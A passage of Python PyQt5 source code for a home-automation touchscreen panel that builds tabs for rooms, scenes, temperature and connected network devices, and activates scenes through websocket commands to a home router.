MainWindow.setFont(font)\n MainWindow.setStyleSheet(\"color:#FFF;\\n\"\n \"background:none;\")\n self.master_window = QtWidgets.QWidget(MainWindow)\n self.master_window.setObjectName(\"master_window\")\n ## Top bar\n self.topbar = QtWidgets.QWidget(self.master_window)\n self.topbar.setGeometry(QtCore.QRect(0, 0, 480, 51))\n self.topbar.setStyleSheet(\"background:#1c1c1c;\")\n self.topbar.setObjectName(\"topbar\")\n self.time = QtWidgets.QLabel(self.topbar)\n self.time.setGeometry(QtCore.QRect(10, 8, 321, 23))\n font = QtGui.QFont()\n font.setFamily(\"Helvetica Neue LT Com,HelveticaNeueLT Com 45 Lt\")\n font.setPointSize(17)\n font.setWeight(60)\n self.time.setFont(font)\n self.time.setStyleSheet(\"color:white;\\n\"\n \"background:none;\")\n self.time.setObjectName(\"time\")\n self.date = QtWidgets.QLabel(self.topbar)\n self.date.setGeometry(QtCore.QRect(10, 28, 261, 18))\n self.date.setStyleSheet(\"color:white;\\n\"\n \"background:none;\")\n font = QtGui.QFont()\n font.setFamily(\"Helvetica Neue LT Com,HelveticaNeueLT Com 45 Lt\")\n font.setPointSize(12)\n font.setWeight(60)\n self.date.setFont(font)\n self.date.setObjectName(\"date\")\n self.micbox = QtWidgets.QWidget(self.topbar)\n self.micbox.setGeometry(QtCore.QRect(430, 0, 51, 51))\n self.micbox.setStyleSheet(\"background:#424242;\")\n self.micbox.setObjectName(\"micbox\")\n self.mic = QtWidgets.QLabel(self.micbox)\n self.mic.setGeometry(QtCore.QRect(16, 5, 21, 41))\n self.mic.setText(\"\")\n self.mic.setPixmap(QtGui.QPixmap(dir_path+\"/static/mic.png\"))\n self.mic.setObjectName(\"mic\")\n self.mic.mouseReleaseEvent = self.micClick\n ## Tabs\n self.tabs = QtWidgets.QTabWidget(self.master_window)\n self.tabs.setGeometry(QtCore.QRect(-1, 49, 482, 271))\n self.tabs.setLayoutDirection(QtCore.Qt.LeftToRight)\n self.tabs.setAutoFillBackground(False)\n self.tabs.setStyleSheet(\"QTabWidget::pane {\\n\"\n \" margin:0px;\\n\"\n \" padding:0px;\\n\"\n \"}\\n\"\n \"QTabWidget::tab-bar {\\n\"\n \" alignment: center;\\n\"\n \"}\\n\"\n \"QTabBar::tab {\\n\"\n \" border-top: 2px solid white;\\n\"\n \" border-bottom: 2px solid white;\\n\"\n \" border-right: 2px solid white;\\n\"\n \" padding: 0px;\\n\"\n \" margin-top:0px;\\n\"\n \" margin-left:0px;\\n\"\n \" margin-bottom:0px;\\n\"\n \"}\\n\"\n \"QTabBar::tab::first {\\n\"\n \" padding: 0px;\\n\"\n \" margin-bottom:0px;\\n\"\n \" margin-left:0px;\\n\"\n \"}\\n\"\n \"QTabBar::tab::last {\\n\"\n \" border-right:none;\\n\"\n \" padding: 0px;\\n\"\n \" margin-bottom:0px;\\n\"\n \" margin-left:0px;\\n\"\n \"}\\n\"\n \"QTabBar::tab::selected {\\n\"\n \" background:white;\\n\"\n \"}\")\n self.tabs.setTabPosition(QtWidgets.QTabWidget.South)\n self.tabs.setTabShape(QtWidgets.QTabWidget.Triangular)\n self.tabs.setIconSize(QtCore.QSize(79, 40))\n self.tabs.setElideMode(QtCore.Qt.ElideRight)\n self.tabs.setUsesScrollButtons(False)\n self.tabs.setDocumentMode(False)\n self.tabs.setTabsClosable(False)\n self.tabs.setMovable(False)\n self.tabs.setObjectName(\"tabs\")\n ## Home Tab\n self.home = QtWidgets.QWidget()\n self.home.setStyleSheet(\n \"background:qlineargradient(spread:pad, x1:0, y1:1, x2:1, y2:0, stop:0 rgba(0, 113, 188, 255), stop:1 rgba(212, 20, 90, 255));\")\n self.home.setObjectName(\"home\")\n self.floorplan = QtWidgets.QLabel(self.home)\n self.floorplan.setGeometry(QtCore.QRect(50, 30, 371, 171))\n self.floorplan.setStyleSheet(\"background:none;\")\n self.floorplan.setText(\"\")\n self.floorplan.setPixmap(QtGui.QPixmap(dir_path+\"/static/floor.png\"))\n self.floorplan.setObjectName(\"floorplan\")\n self.livingroom_trigger = QtWidgets.QLabel(self.home)\n self.livingroom_trigger.setGeometry(QtCore.QRect(90, 128, 32, 33))\n self.livingroom_trigger.setStyleSheet(\"background:none;\")\n self.livingroom_trigger.setText(\"\")\n self.livingroom_trigger.setPixmap(QtGui.QPixmap(dir_path+\"/static/touch.png\"))\n self.livingroom_trigger.setAlignment(QtCore.Qt.AlignCenter)\n self.livingroom_trigger.setObjectName(\"livingroom_trigger\")\n self.livingroom_trigger.mouseReleaseEvent = self.setRoomLivingRoom\n self.bedroom_trigger = QtWidgets.QLabel(self.home)\n self.bedroom_trigger.setGeometry(QtCore.QRect(164, 86, 32, 33))\n self.bedroom_trigger.setStyleSheet(\"background:none;\")\n self.bedroom_trigger.setText(\"\")\n self.bedroom_trigger.setPixmap(QtGui.QPixmap(dir_path+\"/static/touch.png\"))\n self.bedroom_trigger.setAlignment(QtCore.Qt.AlignCenter)\n self.bedroom_trigger.setObjectName(\"bedroom_trigger\")\n self.bedroom_trigger.mouseReleaseEvent = self.setRoomBedroom\n self.office_trigger = QtWidgets.QLabel(self.home)\n self.office_trigger.setGeometry(QtCore.QRect(219, 44, 32, 33))\n self.office_trigger.setStyleSheet(\"background:none;\")\n self.office_trigger.setText(\"\")\n self.office_trigger.setPixmap(QtGui.QPixmap(dir_path+\"/static/touch.png\"))\n self.office_trigger.setAlignment(QtCore.Qt.AlignCenter)\n self.office_trigger.setObjectName(\"office_trigger\")\n self.office_trigger.mouseReleaseEvent = self.setRoomOffice\n icon = QtGui.QIcon()\n icon.addPixmap(QtGui.QPixmap(dir_path+\"/static/home-lock.png\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n icon.addPixmap(QtGui.QPixmap(dir_path+\"/static/home-lock-alt.png\"), QtGui.QIcon.Normal, QtGui.QIcon.On)\n self.tabs.addTab(self.home, icon, \"\")\n ## Scenes Tab\n self.scenes = QtWidgets.QWidget()\n self.scenes.setStyleSheet(\n \"background:qlineargradient(spread:pad, x1:0, y1:1, x2:1, y2:0, stop:0 rgba(0, 113, 188, 255), stop:1 rgba(212, 20, 90, 255));\")\n self.scenes.setObjectName(\"scenes\")\n self.scene_selector = QtWidgets.QScrollArea(self.scenes)\n self.scene_selector.setGeometry(QtCore.QRect(220, 3, 220, 220))\n self.scene_selector.setStyleSheet(\"background:transparent;border:none\")\n self.scene_selector.setWidgetResizable(True)\n self.scene_selector.setObjectName(\"scene_selector\")\n self.scene_selector_widget = QtWidgets.QWidget()\n self.scene_selector_widget.setGeometry(QtCore.QRect(0, 0, 220, 220))\n self.scene_selector_widget.setObjectName(\"scene_selector_widget\")\n\n self.scene1 = QtWidgets.QLabel(self.scene_selector_widget)\n self.scene1.setGeometry(QtCore.QRect(40, 20, 131, 31))\n font = QtGui.QFont()\n font.setFamily(\"Helvetica Neue LT Com,HelveticaNeueLT Com 45 Lt\")\n font.setWeight(10)\n font.setPointSize(20)\n self.scene1.setFont(font)\n self.scene1.setAlignment(QtCore.Qt.AlignCenter)\n self.scene1.setObjectName(\"scene1\")\n self.scene1.mouseReleaseEvent = lambda event:self.setScene(\"1\")\n\n self.spacer1 = QtWidgets.QLabel(self.scene_selector_widget)\n self.spacer1.setGeometry(QtCore.QRect(50, 50, 111, 2))\n self.spacer1.setStyleSheet(\"background:rgba(71, 71, 71, 211);\")\n self.spacer1.setText(\"\")\n self.spacer1.setObjectName(\"spacer1\")\n\n self.scene2 = QtWidgets.QLabel(self.scene_selector_widget)\n self.scene2.setGeometry(QtCore.QRect(40, 60, 131, 31))\n font = QtGui.QFont()\n font.setFamily(\"Helvetica Neue LT Com,HelveticaNeueLT Com 45 Lt\")\n font.setWeight(10)\n font.setPointSize(20)\n self.scene2.setFont(font)\n self.scene2.setAlignment(QtCore.Qt.AlignCenter)\n self.scene2.setObjectName(\"scene2\")\n self.scene2.mouseReleaseEvent = lambda event:self.setScene(\"2\")\n\n self.spacer2 = QtWidgets.QLabel(self.scene_selector_widget)\n self.spacer2.setGeometry(QtCore.QRect(50, 90, 111, 2))\n self.spacer2.setStyleSheet(\"background:rgba(71, 71, 71, 211);\")\n self.spacer2.setText(\"\")\n self.spacer2.setObjectName(\"spacer2\")\n\n self.scene3 = QtWidgets.QLabel(self.scene_selector_widget)\n self.scene3.setGeometry(QtCore.QRect(40, 100, 131, 31))\n font = QtGui.QFont()\n font.setFamily(\"Helvetica Neue LT Com,HelveticaNeueLT Com 45 Lt\")\n font.setWeight(10)\n font.setPointSize(20)\n self.scene3.setFont(font)\n self.scene3.setAlignment(QtCore.Qt.AlignCenter)\n self.scene3.setObjectName(\"scene3\")\n self.scene3.mouseReleaseEvent = lambda event:self.setScene(\"3\")\n\n self.spacer3 = QtWidgets.QLabel(self.scene_selector_widget)\n self.spacer3.setGeometry(QtCore.QRect(50, 130, 111, 2))\n self.spacer3.setStyleSheet(\"background:rgba(71, 71, 71, 211);\")\n self.spacer3.setText(\"\")\n self.spacer3.setObjectName(\"spacer3\")\n\n self.scene4 = QtWidgets.QLabel(self.scene_selector_widget)\n self.scene4.setGeometry(QtCore.QRect(40, 140, 131, 31))\n font = QtGui.QFont()\n font.setFamily(\"Helvetica Neue LT Com,HelveticaNeueLT Com 45 Lt\")\n font.setWeight(10)\n font.setPointSize(20)\n self.scene4.setFont(font)\n self.scene4.setAlignment(QtCore.Qt.AlignCenter)\n self.scene4.setObjectName(\"scene4\")\n self.scene4.mouseReleaseEvent = lambda event:self.setScene(\"4\")\n\n self.spacer4 = QtWidgets.QLabel(self.scene_selector_widget)\n self.spacer4.setGeometry(QtCore.QRect(50, 170, 111, 2))\n self.spacer4.setStyleSheet(\"background:rgba(71, 71, 71, 211);\")\n self.spacer4.setText(\"\")\n self.spacer4.setObjectName(\"spacer4\")\n\n self.scene5 = QtWidgets.QLabel(self.scene_selector_widget)\n self.scene5.setGeometry(QtCore.QRect(40, 180, 131, 31))\n font = QtGui.QFont()\n font.setFamily(\"Helvetica Neue LT Com,HelveticaNeueLT Com 45 Lt\")\n font.setWeight(10)\n font.setPointSize(20)\n self.scene5.setFont(font)\n self.scene5.setAlignment(QtCore.Qt.AlignCenter)\n self.scene5.setObjectName(\"scene5\")\n self.scene5.mouseReleaseEvent = lambda event:self.setScene(\"5\")\n\n self.scene6 = QtWidgets.QLabel(self.scene_selector_widget)\n self.scene6.setGeometry(QtCore.QRect(40, 220, 131, 31))\n font = QtGui.QFont()\n font.setFamily(\"Helvetica Neue LT Com,HelveticaNeueLT Com 45 Lt\")\n font.setWeight(10)\n font.setPointSize(20)\n self.scene6.setFont(font)\n self.scene6.setAlignment(QtCore.Qt.AlignCenter)\n self.scene6.setObjectName(\"scene6\")\n self.scene6.mouseReleaseEvent = lambda event:self.setScene(\"6\")\n\n self.scene_selector.setWidget(self.scene_selector_widget)\n self.inside_temp_scenes_label = QtWidgets.QLabel(self.scenes)\n self.inside_temp_scenes_label.setGeometry(QtCore.QRect(80, 80, 73, 21))\n font = QtGui.QFont()\n font.setFamily(\"Helvetica Neue LT Com,HelveticaNeueLT Com 45 Lt\")\n font.setPointSize(18)\n font.setWeight(10)\n self.inside_temp_scenes_label.setFont(font)\n self.inside_temp_scenes_label.setStyleSheet(\"background:none;\")\n self.inside_temp_scenes_label.setAlignment(QtCore.Qt.AlignCenter)\n self.inside_temp_scenes_label.setObjectName(\"inside_temp_scenes_label\")\n self.outside_temp_scenes = QtWidgets.QLabel(self.scenes)\n self.outside_temp_scenes.setGeometry(QtCore.QRect(60, 118, 111, 51))\n font = QtGui.QFont()\n font.setFamily(\"Helvetica Neue LT Com,HelveticaNeueLT Com 45 Lt\")\n font.setPointSize(39)\n font.setWeight(10)\n self.outside_temp_scenes.setFont(font)\n self.outside_temp_scenes.setStyleSheet(\"background:none;\")\n self.outside_temp_scenes.setAlignment(QtCore.Qt.AlignCenter)\n self.outside_temp_scenes.setObjectName(\"outside_temp_scenes\")\n self.inside_temp_scenes = QtWidgets.QLabel(self.scenes)\n self.inside_temp_scenes.setGeometry(QtCore.QRect(60, 35, 111, 51))\n font = QtGui.QFont()\n font.setFamily(\"Helvetica Neue LT Com,HelveticaNeueLT Com 45 Lt\")\n font.setPointSize(39)\n font.setWeight(10)\n self.inside_temp_scenes.setFont(font)\n self.inside_temp_scenes.setStyleSheet(\"background:none;\")\n self.inside_temp_scenes.setTextFormat(QtCore.Qt.PlainText)\n self.inside_temp_scenes.setAlignment(QtCore.Qt.AlignCenter)\n self.inside_temp_scenes.setObjectName(\"inside_temp_scenes\")\n self.outside_temp_scenes_label = QtWidgets.QLabel(self.scenes)\n self.outside_temp_scenes_label.setGeometry(QtCore.QRect(80, 160, 73, 21))\n font = QtGui.QFont()\n font.setFamily(\"Helvetica Neue LT Com,HelveticaNeueLT Com 45 Lt\")\n font.setPointSize(18)\n font.setWeight(10)\n self.outside_temp_scenes_label.setFont(font)\n self.outside_temp_scenes_label.setStyleSheet(\"background:none;\")\n self.outside_temp_scenes_label.setAlignment(QtCore.Qt.AlignCenter)\n self.outside_temp_scenes_label.setObjectName(\"outside_temp_scenes_label\")\n icon1 = QtGui.QIcon()\n icon1.addPixmap(QtGui.QPixmap(dir_path+\"/static/scenes.png\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n icon1.addPixmap(QtGui.QPixmap(dir_path+\"/static/scenes-alt.png\"), QtGui.QIcon.Normal, QtGui.QIcon.On)\n self.tabs.addTab(self.scenes, icon1, \"\")\n ## Temp Tab\n self.temp = QtWidgets.QWidget()\n self.temp.setStyleSheet(\n \"background:qlineargradient(spread:pad, x1:0, y1:1, x2:1, y2:0, stop:0 rgba(0, 113, 188, 255), stop:1 rgba(212, 20, 90, 255));\")\n self.temp.setObjectName(\"temp\")\n self.outside_temp_temp = QtWidgets.QLabel(self.temp)\n self.outside_temp_temp.setGeometry(QtCore.QRect(60, 118, 111, 51))\n font = QtGui.QFont()\n font.setFamily(\"Helvetica Neue LT Com,HelveticaNeueLT Com 45 Lt\")\n font.setPointSize(39)\n font.setWeight(10)\n self.outside_temp_temp.setFont(font)\n self.outside_temp_temp.setStyleSheet(\"background:none;\")\n self.outside_temp_temp.setAlignment(QtCore.Qt.AlignCenter)\n self.outside_temp_temp.setObjectName(\"outside_temp_temp\")\n self.inside_temp_temp_label = QtWidgets.QLabel(self.temp)\n self.inside_temp_temp_label.setGeometry(QtCore.QRect(80, 80, 73, 21))\n font = QtGui.QFont()\n font.setFamily(\"Helvetica Neue LT Com,HelveticaNeueLT Com 45 Lt\")\n font.setPointSize(18)\n font.setWeight(10)\n self.inside_temp_temp_label.setFont(font)\n self.inside_temp_temp_label.setStyleSheet(\"background:none;\")\n self.inside_temp_temp_label.setAlignment(QtCore.Qt.AlignCenter)\n self.inside_temp_temp_label.setObjectName(\"inside_temp_temp_label\")\n self.inside_temp_temp = QtWidgets.QLabel(self.temp)\n self.inside_temp_temp.setGeometry(QtCore.QRect(60, 35, 111, 51))\n font = QtGui.QFont()\n font.setFamily(\"Helvetica Neue LT Com,HelveticaNeueLT Com 45 Lt\")\n font.setPointSize(39)\n font.setWeight(10)\n self.inside_temp_temp.setFont(font)\n self.inside_temp_temp.setStyleSheet(\"background:none;\")\n self.inside_temp_temp.setAlignment(QtCore.Qt.AlignCenter)\n self.inside_temp_temp.setObjectName(\"inside_temp_temp\")\n self.outside_temp_temp_label = QtWidgets.QLabel(self.temp)\n self.outside_temp_temp_label.setGeometry(QtCore.QRect(80, 160, 73, 21))\n font = QtGui.QFont()\n font.setFamily(\"Helvetica Neue LT Com,HelveticaNeueLT Com 45 Lt\")\n font.setPointSize(18)\n font.setWeight(10)\n self.outside_temp_temp_label.setFont(font)\n self.outside_temp_temp_label.setStyleSheet(\"background:none;\")\n self.outside_temp_temp_label.setAlignment(QtCore.Qt.AlignCenter)\n self.outside_temp_temp_label.setObjectName(\"outside_temp_temp_label\")\n self.set_temp = QtWidgets.QLabel(self.temp)\n self.set_temp.setGeometry(QtCore.QRect(280, 65, 100, 100))\n font = QtGui.QFont()\n font.setFamily(\"Helvetica Neue LT Com,HelveticaNeueLT Com 45 Lt\")\n font.setPointSize(30)\n font.setWeight(60)\n self.set_temp.setFont(font)\n self.set_temp.setStyleSheet(\"background:none;\\n\"\n \"border:4px solid #29abe2;\")\n self.set_temp.setFrameShape(QtWidgets.QFrame.NoFrame)\n self.set_temp.setLineWidth(4)\n self.set_temp.setAlignment(QtCore.Qt.AlignCenter)\n self.set_temp.setObjectName(\"set_temp\")\n self.temp_mode = QtWidgets.QWidget(self.temp)\n self.temp_mode.setGeometry(QtCore.QRect(280, 170, 100, 10))\n self.temp_mode.setStyleSheet(\"background:#c1272d;\")\n self.temp_mode.setObjectName(\"temp_mode\")\n self.arrow_down = QtWidgets.QLabel(self.temp)\n self.arrow_down.setGeometry(QtCore.QRect(230, 95, 27, 36))\n self.arrow_down.setStyleSheet(\"background:none;\")\n self.arrow_down.setText(\"\")\n self.arrow_down.setPixmap(QtGui.QPixmap(dir_path+\"/static/down_arrow.png\"))\n self.arrow_down.setObjectName(\"arrow_down\")\n self.arrow_up = QtWidgets.QLabel(self.temp)\n self.arrow_up.setGeometry(QtCore.QRect(400, 95, 27, 36))\n self.arrow_up.setStyleSheet(\"background:none;\")\n self.arrow_up.setText(\"\")\n self.arrow_up.setPixmap(QtGui.QPixmap(dir_path+\"/static/up_arrow.png\"))\n self.arrow_up.setObjectName(\"arrow_up\")\n icon2 = QtGui.QIcon()\n icon2.addPixmap(QtGui.QPixmap(dir_path+\"/static/temp.png\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n icon2.addPixmap(QtGui.QPixmap(dir_path+\"/static/temp-alt.png\"), QtGui.QIcon.Normal, QtGui.QIcon.On)\n self.tabs.addTab(self.temp, icon2, \"\")\n ## Security Tab\n self.sec = QtWidgets.QWidget()\n self.sec.setStyleSheet(\n \"background:qlineargradient(spread:pad, x1:0, y1:1, x2:1, y2:0, stop:0 rgba(0, 113, 188, 255), stop:1 rgba(212, 20, 90, 255));\")\n self.sec.setObjectName(\"sec\")\n self.dev = QtWidgets.QLabel(self.sec)\n self.dev.setGeometry(QtCore.QRect(100, 170, 280, 20))\n font = QtGui.QFont()\n font.setFamily(\"Helvetica Neue LT Com,HelveticaNeueLT Com 45 Lt\")\n font.setPointSize(12)\n font.setWeight(60)\n self.dev.setFont(font)\n self.dev.setStyleSheet(\"background:none;\\n\"\n \"color:#FFF;\\n\"\n \"\")\n self.dev.setAlignment(QtCore.Qt.AlignCenter)\n self.dev.setObjectName(\"dev\")\n icon3 = QtGui.QIcon()\n icon3.addPixmap(QtGui.QPixmap(dir_path+\"/static/cam.png\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n icon3.addPixmap(QtGui.QPixmap(dir_path+\"/static/cam-alt.png\"), QtGui.QIcon.Normal, QtGui.QIcon.On)\n self.tabs.addTab(self.sec, icon3, \"\")\n ## Network Tab\n self.network = QtWidgets.QWidget()\n self.network.setStyleSheet(\n \"background:qlineargradient(spread:pad, x1:0, y1:1, x2:1, y2:0, stop:0 rgba(0, 113, 188, 255), stop:1 rgba(212, 20, 90, 255));\")\n self.network.setObjectName(\"network\")\n self.devices_label = QtWidgets.QLabel(self.network)\n self.devices_label.setGeometry(QtCore.QRect(30, 15, 221, 31))\n font = QtGui.QFont()\n font.setFamily(\"Helvetica Neue LT Com,HelveticaNeueLT Com 45 Lt\")\n font.setPointSize(18)\n font.setWeight(60)\n self.devices_label.setFont(font)\n self.devices_label.setStyleSheet(\"background:none;\\n\"\n \"color:#FFF;\")\n self.devices_label.setObjectName(\"devices_label\")\n self.devices = QtWidgets.QLabel(self.network)\n self.devices.setGeometry(QtCore.QRect(30, 45, 221, 180))\n font = QtGui.QFont()\n font.setFamily(\"Helvetica Neue LT Com,HelveticaNeueLT Com 45 Lt\")\n font.setPointSize(9)\n font.setWeight(60)\n self.devices.setFont(font)\n self.devices.setStyleSheet(\"background:none;\\n\"\n \"color:#FFF;\")\n self.devices.setObjectName(\"devices\")\n self.hannahstatus = QtWidgets.QLabel(self.network)\n self.hannahstatus.setGeometry(QtCore.QRect(310, 80, 141, 51))\n self.hannahstatus.setStyleSheet(\"background:none;\\n\"\n \"\")\n self.hannahstatus.setText(\"\")\n self.hannahstatus.setPixmap(QtGui.QPixmap(dir_path + \"/static/hannah-away.png\"))\n self.hannahstatus.setObjectName(\"hannahstatus\")\n self.angelicastatus = QtWidgets.QLabel(self.network)\n self.angelicastatus.setGeometry(QtCore.QRect(310, 140, 141, 51))\n self.angelicastatus.setStyleSheet(\"background:none;\\n\"\n \"\")\n self.angelicastatus.setText(\"\")\n self.angelicastatus.setPixmap(QtGui.QPixmap(dir_path+\"/static/angelica-away.png\"))\n self.angelicastatus.setObjectName(\"angelicastatus\")\n icon4 = QtGui.QIcon()\n icon4.addPixmap(QtGui.QPixmap(dir_path+\"/static/network.png\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n icon4.addPixmap(QtGui.QPixmap(dir_path+\"/static/network-alt.png\"), QtGui.QIcon.Normal, QtGui.QIcon.On)\n self.tabs.addTab(self.network, icon4, \"\")\n ## Final Generations\n self.background = QtWidgets.QWidget(self.master_window)\n self.background.setGeometry(QtCore.QRect(0, 0, 480, 320))\n self.background.setStyleSheet(\"background:#000;\")\n self.background.setObjectName(\"background\")\n self.background.raise_()\n self.topbar.raise_()\n self.tabs.raise_()\n MainWindow.setCentralWidget(self.master_window)\n ## Adds initial values to the UI\n self.retranslateUi(MainWindow)\n ## Starts the date and time timer\n self.setDateTime(MainWindow)\n ## Starts the date and time timer\n self.listenToServer(MainWindow)\n self.tabs.setCurrentIndex(0)\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\n\n def retranslateUi(self, MainWindow):\n _translate = QtCore.QCoreApplication.translate\n MainWindow.setWindowTitle(_translate(\"MainWindow\", \"ScARA Panel\"))\n self.time.setText(_translate(\"MainWindow\", \"Hello!\"))\n self.date.setText(_translate(\"MainWindow\", \"Getting updates now...\"))\n ## Scene Tab\n self.scene1.setText(_translate(\"MainWindow\", \"--\"))\n self.scene2.setText(_translate(\"MainWindow\", \"--\"))\n self.scene3.setText(_translate(\"MainWindow\", \"--\"))\n self.scene4.setText(_translate(\"MainWindow\", \"--\"))\n self.scene5.setText(_translate(\"MainWindow\", \"--\"))\n self.scene6.setText(_translate(\"MainWindow\", \"--\"))\n self.inside_temp_scenes_label.setText(_translate(\"MainWindow\", \"inside\"))\n self.outside_temp_scenes.setText(_translate(\"MainWindow\", \"--°F\"))\n self.inside_temp_scenes.setText(_translate(\"MainWindow\", \"--°F\"))\n self.outside_temp_scenes_label.setText(_translate(\"MainWindow\", \"outside\"))\n ## Temp Tab\n self.outside_temp_temp.setText(_translate(\"MainWindow\", \"--°F\"))\n self.inside_temp_temp_label.setText(_translate(\"MainWindow\", \"inside\"))\n self.inside_temp_temp.setText(_translate(\"MainWindow\", \"--°F\"))\n self.outside_temp_temp_label.setText(_translate(\"MainWindow\", \"outside\"))\n self.set_temp.setText(_translate(\"MainWindow\", \"--°F\"))\n ## Security Tab\n self.dev.setText(_translate(\"MainWindow\", \"This section is still being developed\"))\n ## Network Tab\n self.devices.setText(_translate(\"MainWindow\", \"Getting devices\"))\n self.devices_label.setText(_translate(\"MainWindow\", \"Connected devices\"))\n\n def micClick(self, MainWindow):\n self.t.cancel()\n self.ws.kill()\n sys.exit(0)\n\n ## Set the room, retranslate the scene list, go to scenes\n def setRoomOffice(self, MainWindow):\n _translate = QtCore.QCoreApplication.translate\n self.resetSceneList(MainWindow)\n global currentRoom\n currentRoom = \"Office\"\n currentRecord = 0\n for x in scenes:\n if x['name'].find(currentRoom) == 0:\n currentRecord += 1\n if currentRecord == 1:\n self.scene1.setText(_translate(\"MainWindow\", x['name'][len(currentRoom) + 1:]))\n currentSceneList[1] = x['id']\n elif currentRecord == 2:\n self.scene2.setText(_translate(\"MainWindow\", x['name'][len(currentRoom) + 1:]))\n currentSceneList[2] = x['id']\n elif currentRecord == 3:\n self.scene3.setText(_translate(\"MainWindow\", x['name'][len(currentRoom) + 1:]))\n currentSceneList[3] = x['id']\n elif currentRecord == 4:\n self.scene4.setText(_translate(\"MainWindow\", x['name'][len(currentRoom) + 1:]))\n currentSceneList[4] = x['id']\n elif currentRecord == 5:\n self.scene5.setText(_translate(\"MainWindow\", x['name'][len(currentRoom) + 1:]))\n currentSceneList[5] = x['id']\n elif currentRecord == 6:\n self.scene6.setText(_translate(\"MainWindow\", x['name'][len(currentRoom) + 1:]))\n currentSceneList[6] = x['id']\n self.tabs.setCurrentIndex(0)\n\n def setRoomLivingRoom(self, MainWindow):\n _translate = QtCore.QCoreApplication.translate\n self.resetSceneList(MainWindow)\n global currentRoom\n currentRoom = \"Living Room\"\n currentRecord = 0\n for x in scenes:\n if x['name'].find(currentRoom) == 0:\n currentRecord += 1\n if currentRecord == 1:\n self.scene1.setText(_translate(\"MainWindow\", x['name'][len(currentRoom) + 1:]))\n currentSceneList[1] = x['id']\n elif currentRecord == 2:\n self.scene2.setText(_translate(\"MainWindow\", x['name'][len(currentRoom) + 1:]))\n currentSceneList[2] = x['id']\n elif currentRecord == 3:\n self.scene3.setText(_translate(\"MainWindow\", x['name'][len(currentRoom) + 1:]))\n currentSceneList[3] = x['id']\n elif currentRecord == 4:\n self.scene4.setText(_translate(\"MainWindow\", x['name'][len(currentRoom) + 1:]))\n currentSceneList[4] = x['id']\n elif currentRecord == 5:\n self.scene5.setText(_translate(\"MainWindow\", x['name'][len(currentRoom) + 1:]))\n currentSceneList[5] = x['id']\n elif currentRecord == 6:\n self.scene6.setText(_translate(\"MainWindow\", x['name'][len(currentRoom) + 1:]))\n currentSceneList[6] = x['id']\n self.tabs.setCurrentIndex(0)\n\n def setRoomBedroom(self, MainWindow):\n _translate = QtCore.QCoreApplication.translate\n self.resetSceneList(MainWindow)\n global currentRoom\n currentRoom = \"Bedroom\"\n currentRecord = 0\n for x in scenes:\n if x['name'].find(currentRoom) == 0:\n currentRecord += 1\n if currentRecord == 1:\n self.scene1.setText(_translate(\"MainWindow\", x['name'][len(currentRoom) + 1:]))\n currentSceneList[1] = x['id']\n elif currentRecord == 2:\n self.scene2.setText(_translate(\"MainWindow\", x['name'][len(currentRoom) + 1:]))\n currentSceneList[2] = x['id']\n elif currentRecord == 3:\n self.scene3.setText(_translate(\"MainWindow\", x['name'][len(currentRoom) + 1:]))\n currentSceneList[3] = x['id']\n elif currentRecord == 4:\n self.scene4.setText(_translate(\"MainWindow\", x['name'][len(currentRoom) + 1:]))\n currentSceneList[4] = x['id']\n elif currentRecord == 5:\n self.scene5.setText(_translate(\"MainWindow\", x['name'][len(currentRoom) + 1:]))\n currentSceneList[5] = x['id']\n elif currentRecord == 6:\n self.scene6.setText(_translate(\"MainWindow\", x['name'][len(currentRoom) + 1:]))\n currentSceneList[6] = x['id']\n self.tabs.setCurrentIndex(0)\n\n def resetSceneList(self, MainWindow):\n _translate = QtCore.QCoreApplication.translate\n self.scene1.setText(_translate(\"MainWindow\", \"\"))\n self.scene2.setText(_translate(\"MainWindow\", \"\"))\n self.scene3.setText(_translate(\"MainWindow\", \"\"))\n self.scene4.setText(_translate(\"MainWindow\", \"\"))\n self.scene5.setText(_translate(\"MainWindow\", \"\"))\n self.scene6.setText(_translate(\"MainWindow\", \"\"))\n currentSceneList[1] = 0\n currentSceneList[2] = 0\n currentSceneList[3] = 0\n currentSceneList[4] = 0\n currentSceneList[5] = 0\n currentSceneList[6] = 0\n\n def setScene(self, scene):\n sceneID = currentSceneList[int(scene)]\n from websocket import create_connection\n ws = create_connection(\"ws://YOURALMONDROUTER:7681/root/YOURALMONDPASSWORD\")\n ws.send('{\"CommandType\":\"ActivateScene\",\"MobileInternalIndex\":\"setScene'+sceneID+'\",\"Scenes\":{\"ID\":\"'+sceneID+'\"}}')\n result = ws.recv()\n ws.close()\n\n ## Sets the date and time ever 60 seconds\n def setDateTime(self, MainWindow):\n currentTime = time.strftime(\"%I:%M%p\")\n currentDate = time.strftime(\"%A, %d %B %Y\")\n _translate = QtCore.QCoreApplication.translate\n self.time.setText(_translate(\"MainWindow\", \"Hello! It is \" + currentTime))\n self.date.setText(_translate(\"MainWindow\", \"\" + currentDate))\n self.t = Timer(60, self.setDateTime, args=[MainWindow])\n self.t.start()\n\n ## Establishes a QProcess to listen to the server\n def listenToServer(self, MainWindow):\n self.ws = QtCore.QProcess(self)\n self.ws.start(\"python3 -u /home/pi/scara_panel/ws.py\")\n self.ws.readyReadStandardOutput.connect(self.processServer)\n\n ## Processes messages from the server and translates accordingly\n def processServer(self):\n income = str(self.ws.readAllStandardOutput())\n _translate = QtCore.QCoreApplication.translate\n if income.find(\"almondSceneList\") == 2:\n data = income[17:]\n data = data[:len(data)-3]\n data = data.replace(\"\\\\\", \"\")\n global scenes\n scenes = json.loads(data)\n elif income.find(\"almondClientList\") == 2:\n data = income[18:]\n data = data[:len(data) - 3]\n data = data.replace(\"\\\\\", \"\")\n global clients\n clients = json.loads(data)\n clientsStr = \"\"\n for x in clients:\n clientsStr += x['name']+\" (\"+x['ip']+\")\\n\"\n self.devices.setText(_translate(\"MainWindow\", clientsStr))\n self.angelicastatus.setPixmap(QtGui.QPixmap(dir_path + \"/static/angelica-away.png\"))\n self.hannahstatus.setPixmap(QtGui.QPixmap(dir_path + \"/static/hannah-away.png\"))\n for x in clients:\n if x['ip'] == \"10.10.10.15\":\n self.angelicastatus.setPixmap(QtGui.QPixmap(dir_path + \"/static/angelica-home.png\"))\n icon = QtGui.QIcon()\n icon.addPixmap(QtGui.QPixmap(dir_path + \"/static/home-love.png\"), QtGui.QIcon.Normal,\n QtGui.QIcon.Off)\n 